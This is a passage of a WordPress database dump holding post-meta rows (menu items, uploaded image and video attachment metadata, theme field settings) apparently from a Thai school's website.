(92,38,'_menu_item_xfn',''),
(93,38,'_menu_item_url','#'),
(95,39,'_menu_item_type','custom'),
(96,39,'_menu_item_menu_item_parent','0'),
(97,39,'_menu_item_object_id','39'),
(98,39,'_menu_item_object','custom'),
(99,39,'_menu_item_target',''),
(100,39,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(101,39,'_menu_item_xfn',''),
(102,39,'_menu_item_url','https://www.facebook.com/profile.php?id=61556083436494'),
(110,40,'_wp_attached_file','2024/07/434878811_122134783502202781_1764078122862278595_n.jpg'),
(111,40,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2021;s:6:\"height\";i:748;s:4:\"file\";s:62:\"2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\";s:8:\"filesize\";i:281549;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"434878811_122134783502202781_1764078122862278595_n-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13778;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"434878811_122134783502202781_1764078122862278595_n-1024x379.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:379;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101321;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"434878811_122134783502202781_1764078122862278595_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10438;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"434878811_122134783502202781_1764078122862278595_n-768x284.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64455;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"434878811_122134783502202781_1764078122862278595_n-1536x568.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:568;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184937;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"434878811_122134783502202781_1764078122862278595_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25648;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(112,19,'_generateblocks_dynamic_css_version','2.1.2'),
(113,41,'title_style','default'),
(114,41,'_title_style','field_5d1a0217cf408'),
(120,46,'_wp_attached_file','2024/07/นายอนุศักดิ์-พันธ์งาม-png.png'),
(121,46,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1358;s:6:\"height\";i:1831;s:4:\"file\";s:77:\"2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\";s:8:\"filesize\";i:2878106;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:77:\"นายอนุศักดิ์-พันธ์งาม-png-223x300.png\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110941;}s:5:\"large\";a:5:{s:4:\"file\";s:78:\"นายอนุศักดิ์-พันธ์งาม-png-759x1024.png\";s:5:\"width\";i:759;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1014957;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:77:\"นายอนุศักดิ์-พันธ์งาม-png-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43715;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:78:\"นายอนุศักดิ์-พันธ์งาม-png-768x1035.png\";s:5:\"width\";i:768;s:6:\"height\";i:1035;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1035174;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:79:\"นายอนุศักดิ์-พันธ์งาม-png-1139x1536.png\";s:5:\"width\";i:1139;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2063913;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:77:\"นายอนุศักดิ์-พันธ์งาม-png-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:122225;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(124,49,'title_style','default'),
(125,49,'_title_style','field_5d1a0217cf408'),
(129,53,'title_style','default'),
(130,53,'_title_style','field_5d1a0217cf408'),
(131,54,'title_style','default'),
(132,54,'_title_style','field_5d1a0217cf408'),
(136,58,'title_style','default'),
(137,58,'_title_style','field_5d1a0217cf408'),
(143,64,'_wp_attached_file','2024/07/วันครู-1.mp4'),
(144,64,'_wp_attachment_metadata','a:11:{s:7:\"bitrate\";i:553539;s:8:\"filesize\";i:17301813;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:230;s:16:\"length_formatted\";s:4:\"3:50\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:9:{s:10:\"dataformat\";s:3:\"mp4\";s:7:\"bitrate\";i:47976;s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";s:17:\"compression_ratio\";d:0.03399659863945578;}s:17:\"created_timestamp\";i:-2082844800;}'),
(145,65,'_wp_attached_file','2024/07/VTR-แนะนำโรงเรียน.png'),
(146,65,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:55:\"2024/07/VTR-แนะนำโรงเรียน.png\";s:8:\"filesize\";i:1555825;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"VTR-แนะนำโรงเรียน-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:78142;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"VTR-แนะนำโรงเรียน-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:727591;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"VTR-แนะนำโรงเรียน-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35827;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"VTR-แนะนำโรงเรียน-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:428843;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"VTR-แนะนำโรงเรียน-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1475477;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"VTR-แนะนำโรงเรียน-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104513;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(147,66,'title_style','default'),
(148,66,'_title_style','field_5d1a0217cf408'),
(151,69,'title_style','default'),
(152,69,'_title_style','field_5d1a0217cf408'),
(201,73,'title_style','default'),
(202,73,'_title_style','field_5d1a0217cf408'),
(203,74,'title_style','default'),
(204,74,'_title_style','field_5d1a0217cf408'),
(210,77,'title_style','default'),
(211,77,'_title_style','field_5d1a0217cf408'),
(213,79,'_wp_attached_file','2024/07/อนุบาลวัดพระโต.mp4'),
(214,79,'_wp_attachment_metadata','a:10:{s:7:\"bitrate\";i:4733339;s:8:\"filesize\";i:6989909;s:9:\"mime_type\";s:15:\"video/quicktime\";s:6:\"length\";i:12;s:16:\"length_formatted\";s:4:\"0:12\";s:5:\"width\";i:1500;s:6:\"height\";i:600;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:17:\"created_timestamp\";i:-2082844800;}'),
(215,80,'title_style','default'),
(216,80,'_title_style','field_5d1a0217cf408'),
(218,82,'title_style','default'),
(219,82,'_title_style','field_5d1a0217cf408'),
(220,83,'title_style','default'),
(221,83,'_title_style','field_5d1a0217cf408'),
(223,85,'_wp_attached_file','2024/07/awpt.gif'),
(224,85,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:16:\"2024/07/awpt.gif\";s:8:\"filesize\";i:67196883;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"awpt-300x120.gif\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:20423;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"awpt-1024x410.gif\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:161880;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"awpt-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:12158;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"awpt-768x307.gif\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:96008;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"awpt-360x189.gif\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:34899;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(225,86,'title_style','default'),
(226,86,'_title_style','field_5d1a0217cf408'),
(229,88,'_edit_lock','1722253311:1'),
(230,89,'_wp_attached_file','2024/07/bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268.jpg'),
(231,89,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1536;s:6:\"height\";i:864;s:4:\"file\";s:76:\"2024/07/bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268.jpg\";s:8:\"filesize\";i:584380;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:76:\"bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21791;}s:5:\"large\";a:5:{s:4:\"file\";s:77:\"bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:176214;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:76:\"bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10151;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:76:\"bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114229;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:76:\"bbf748f7ec95ca22cc43c88f2cbabaed96a3f710b9e0ad63d5bd93e3041f3268-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28301;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(234,88,'_thumbnail_id','89'),
(235,88,'_edit_last','1'),
(236,88,'title_style','default'),
(237,88,'_title_style','field_5d1a0217cf408'),
(238,88,'related',''),
(239,88,'_related','field_603b51c3e183e'),
(240,90,'title_style','default'),
(241,90,'_title_style','field_5d1a0217cf408'),
(242,90,'related',''),
(243,90,'_related','field_603b51c3e183e'),
(244,91,'title_style','default'),
(245,91,'_title_style','field_5d1a0217cf408'),
(246,92,'title_style','default'),
(247,92,'_title_style','field_5d1a0217cf408'),
(248,93,'title_style','default'),
(249,93,'_title_style','field_5d1a0217cf408'),
(251,95,'title_style','default'),
(252,95,'_title_style','field_5d1a0217cf408'),
(253,96,'_edit_lock','1722252963:1'),
(254,97,'_wp_attached_file','2024/07/452968986_122165652428202781_733399249219556966_n.jpg'),
(255,97,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:4:\"file\";s:61:\"2024/07/452968986_122165652428202781_733399249219556966_n.jpg\";s:8:\"filesize\";i:293340;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"452968986_122165652428202781_733399249219556966_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24409;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"452968986_122165652428202781_733399249219556966_n-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162486;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"452968986_122165652428202781_733399249219556966_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8400;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"452968986_122165652428202781_733399249219556966_n-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104817;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"452968986_122165652428202781_733399249219556966_n-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:276368;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"452968986_122165652428202781_733399249219556966_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19070;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(258,96,'_thumbnail_id','97'),
(259,96,'_edit_last','1'),
(261,96,'title_style','default'),
(262,96,'_title_style','field_5d1a0217cf408'),
(263,96,'related',''),
(264,96,'_related','field_603b51c3e183e'),
(265,98,'title_style','default'),
(266,98,'_title_style','field_5d1a0217cf408'),
(267,98,'related',''),
(268,98,'_related','field_603b51c3e183e'),
(271,99,'title_style','default'),
(272,99,'_title_style','field_5d1a0217cf408'),
(273,99,'related',''),
(274,99,'_related','field_603b51c3e183e'),
(275,100,'_edit_lock','1722253328:1'),
(276,101,'_wp_attached_file','2024/07/452420753_122164291130202781_6266995543246923356_n.jpg'),
(277,101,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1716;s:4:\"file\";s:62:\"2024/07/452420753_122164291130202781_6266995543246923356_n.jpg\";s:8:\"filesize\";i:306642;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"452420753_122164291130202781_6266995543246923356_n-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25563;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"452420753_122164291130202781_6266995543246923356_n-1024x858.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:858;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168938;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"452420753_122164291130202781_6266995543246923356_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9290;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"452420753_122164291130202781_6266995543246923356_n-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110942;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"452420753_122164291130202781_6266995543246923356_n-1536x1287.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1287;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:294521;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"452420753_122164291130202781_6266995543246923356_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23488;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(280,100,'_thumbnail_id','101'),
(281,100,'_edit_last','1'),
(282,100,'title_style','default'),
(283,100,'_title_style','field_5d1a0217cf408'),
(284,100,'related',''),
(285,100,'_related','field_603b51c3e183e'),
(286,102,'title_style','default'),
(287,102,'_title_style','field_5d1a0217cf408'),
(288,102,'related',''),
(289,102,'_related','field_603b51c3e183e'),
(290,103,'title_style','default'),
(291,103,'_title_style','field_5d1a0217cf408'),
(294,104,'_edit_lock','1722253425:1'),
(295,105,'_wp_attached_file','2024/07/451952522_122164263800202781_1861607146297179774_n.jpg'),
(296,105,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/07/451952522_122164263800202781_1861607146297179774_n.jpg\";s:8:\"filesize\";i:403045;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"451952522_122164263800202781_1861607146297179774_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27709;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"451952522_122164263800202781_1861607146297179774_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:210999;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"451952522_122164263800202781_1861607146297179774_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11037;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"451952522_122164263800202781_1861607146297179774_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132085;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"451952522_122164263800202781_1861607146297179774_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:374768;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"451952522_122164263800202781_1861607146297179774_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29048;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(299,104,'_thumbnail_id','105'),
(300,104,'_edit_last','1'),
(302,104,'title_style','default'),
(303,104,'_title_style','field_5d1a0217cf408'),
(304,104,'related',''),
(305,104,'_related','field_603b51c3e183e'),
(306,106,'title_style','default'),
(307,106,'_title_style','field_5d1a0217cf408'),
(308,106,'related',''),
(309,106,'_related','field_603b51c3e183e'),
(310,107,'_edit_lock','1722253573:1'),
(311,108,'_wp_attached_file','2024/07/451958383_122164259396202781_8297728464333363206_n.jpg'),
(312,108,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2024/07/451958383_122164259396202781_8297728464333363206_n.jpg\";s:8:\"filesize\";i:423741;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"451958383_122164259396202781_8297728464333363206_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25096;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"451958383_122164259396202781_8297728464333363206_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207500;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"451958383_122164259396202781_8297728464333363206_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10534;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"451958383_122164259396202781_8297728464333363206_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:217883;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"451958383_122164259396202781_8297728464333363206_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:370865;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"451958383_122164259396202781_8297728464333363206_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28813;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(315,107,'_generateblocks_dynamic_css_version','1.9.1'),
(316,107,'_thumbnail_id','108'),
(317,107,'_edit_last','1'),
(318,107,'title_style','default'),
(319,107,'_title_style','field_5d1a0217cf408'),
(320,107,'related',''),
(321,107,'_related','field_603b51c3e183e'),
(322,109,'title_style','default'),
(323,109,'_title_style','field_5d1a0217cf408'),
(324,109,'related',''),
(325,109,'_related','field_603b51c3e183e'),
(326,110,'title_style','default'),
(327,110,'_title_style','field_5d1a0217cf408'),
(328,111,'title_style','default'),
(329,111,'_title_style','field_5d1a0217cf408'),
(330,112,'_edit_lock','1722253703:1'),
(331,113,'_wp_attached_file','2024/07/451759934_122163852500202781_3168910256563112673_n.jpg'),
(332,113,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2024/07/451759934_122163852500202781_3168910256563112673_n.jpg\";s:8:\"filesize\";i:579890;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"451759934_122163852500202781_3168910256563112673_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21027;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"451759934_122163852500202781_3168910256563112673_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164600;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"451759934_122163852500202781_3168910256563112673_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8378;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"451759934_122163852500202781_3168910256563112673_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:171581;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"451759934_122163852500202781_3168910256563112673_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:289829;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"451759934_122163852500202781_3168910256563112673_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16876;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(335,112,'_generateblocks_dynamic_css_version','1.9.1'),
(336,112,'_thumbnail_id','113'),
(337,112,'_edit_last','1'),
(338,112,'title_style','default'),
(339,112,'_title_style','field_5d1a0217cf408'),
(340,112,'related',''),
